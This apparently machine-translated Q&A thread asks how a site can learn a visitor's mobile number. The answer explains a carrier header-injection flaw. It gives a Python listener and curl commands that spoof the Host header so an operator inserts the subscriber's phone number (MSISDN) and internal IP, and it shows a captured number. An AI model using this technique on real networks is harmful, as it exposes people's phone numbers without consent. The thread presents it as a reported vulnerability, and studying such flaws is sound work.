What are the options for determining the user's mobile number? Is it possible to determine the number when visiting specials? web pages? In this case, the identification number is needed on the server side.
- 2JavaScript cannot read / write arbitrary files on the hard disk, copy them, or call programs. It does not have direct access to the operating system. - learn.javascript.ru/intro - entithat
- This is not a technical, but a marketing question: how to make a person leave his phone number. When a visitor comes to your site, you can determine only his IP address, even if he came from the phone - stckvrw
- There is one great option: put a form on the site, asking them to leave a number, that's all. Those wishing to share, unwanted - no. That's all. - Klimenkomud
- What for? In general, to determine purely technical, while at least, no way. Social engineering is needed here. -
|
1 answer
The system of in-depth analysis of traffic is configured so that it adds HTTP service headers when executing an HTTP request to sites (hosts) from the list defined by the operator. The headers can contain the internal IP address of the subscriber, phone number (MSISDN), IMEI and IMSI identifiers, the identifier of the base station (tower) to which the subscriber is connected (ECI / TAC).
We will need to install a simple HTTP server on the Internet server, which will receive the request, display it on the screen, and send an HTTP response. Something like that:
#!/usr/bin/env python3 import socketserver class MyTCPHandler(socketserver.BaseRequestHandler): def handle(self): while True: r = self.request.recv(8192) if b"\r\n\r\n" in r or b"\n\n" in r: break if not r: return print("-----\r\n" + r.decode() + "-----") self.request.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\n") self.request.sendall(b"OK") return if __name__ == "__main__": HOST, PORT = "0.0.0.0", 80 socketserver.ForkingTCPServer.allow_reuse_address = True server = socketserver.ForkingTCPServer((HOST, PORT), MyTCPHandler) server.allow_reuse_address = True server.serve_forever() Send an HTTP request using a Megaphone SIM card:
$ curl myserver.com OK On the server came:
GET / HTTP/1.1 Host: myserver.com User-Agent: curl/7.51.0 Accept: */* Nothing unusual. Let's change the Host header to some internal domain of the operator, for example, to the main site megafon.ru:
$ curl myserver.com -H "Host: megafon.ru" On server:
GET / HTTP/1.1 Host: megafon.ru User-Agent: curl/7.51.0 Accept: */* X-Real-IP: 100.114.20.123 X-NOKIA-MSISDN: 79319350195 Not only the HTTP headers sent by curl came to the server, but also the additional X-Real-IP and X-NOKIA-MSISDN headers containing the internal IP address (for Carrier-grade NAT) and the phone number!
Why did this happen? Apparently, when creating the list, they forgot to link specific domains to specific IP addresses or ranges, and checking that the site is opened from a list is performed only by comparing the HTTP Host header.
Source (there are much more subtleties, for example, the list of internal domains): https://habrahabr.ru/post/345852/
PS: do not forget that this is precisely a vulnerability , that is, it is a mistake in the systems of mobile operators, it is quite possible that this hole will soon be closed.
PSPS: mts this vulnerability fixed.
PavelNewSky PavelNewSky
328 one ten
- Please post links as a supplement to your answer, not instead. After changing or deleting materials by reference, your answer in the current wording will not make sense - tutankhamun
- one@tutankhamun I thank for the remark, corrected and in the future I will consider. - PavelNewSky
|